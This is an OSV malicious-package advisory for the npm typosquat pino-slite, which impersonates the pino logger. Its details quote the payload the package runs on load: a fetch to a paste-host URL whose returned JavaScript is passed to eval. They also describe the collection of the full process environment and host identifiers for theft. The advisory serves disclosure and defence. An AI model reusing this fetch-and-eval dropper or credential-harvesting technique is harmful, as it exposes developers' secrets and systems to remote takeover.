MAL-2026-6078

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6078

Published

2026-06-17T21:40:46Z

Modified

2026-06-17T22:01:48.280824847Z

Summary

Malicious code in pino-slite (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)

pino-slite impersonates the legitimate pino logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named pino). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);}), executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a data object containing {...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.

Database specific

{
    "malicious-packages-origins": [
        {
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006944",
            "import_time": "2026-06-17T21:42:18.197754588Z",
            "modified_time": "2026-06-17T21:40:46Z",
            "versions": [
                "4.1.16"
            ],
            "sha256": "7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e"
        },
        {
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006945",
            "import_time": "2026-06-17T21:42:18.296198728Z",
            "modified_time": "2026-06-17T21:40:49Z",
            "versions": [
                "4.1.12"
            ],
            "sha256": "ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / pino-slite

Package

Name: pino-slite; View open source insights on deps.dev
Purl: pkg:npm/pino-slite

Affected ranges

Affected versions

4.*

4.1.12

4.1.16

Database specific

indicators

{
    "package_integrity": [
        {
            "hashes": {
                "sha1": "1e3cc2363b6a71bdcb7ae8e3052c3b557fbbbd8f",
                "sha512_sri": "sha512-TUxVgdCfhTtdPbyD/tiDcnbJlDO8HxSebYFT2UBAHexWwVdEDqxT6uHDzdP0+uhHU0egoOWk5dY8NqCioL3+dA=="
            },
            "filename": "pino-slite-4.1.16.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "lib/writer.js",
            "tlsh": "c61104a195e7649816302be10cc74820bed5b3423197809cbabcc5d52fe7ce17195f70",
            "sha256": "b6a7f0998e9b8ce77f9492f1156159f143faded6f9d27a790d19e4af8a7d221f"
        },
        {
            "path": "package.json",
            "tlsh": "b3016425ce688e6309d92992882d1187aa60ad6b980cfc2c73c3631d0f8d57f19be57d",
            "sha256": "e84dbee6692b3b39e05a3f3a0873c248336ce1690c1d3141f0ae2e12466c016b"
        }
    ]
}

cwes

[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json"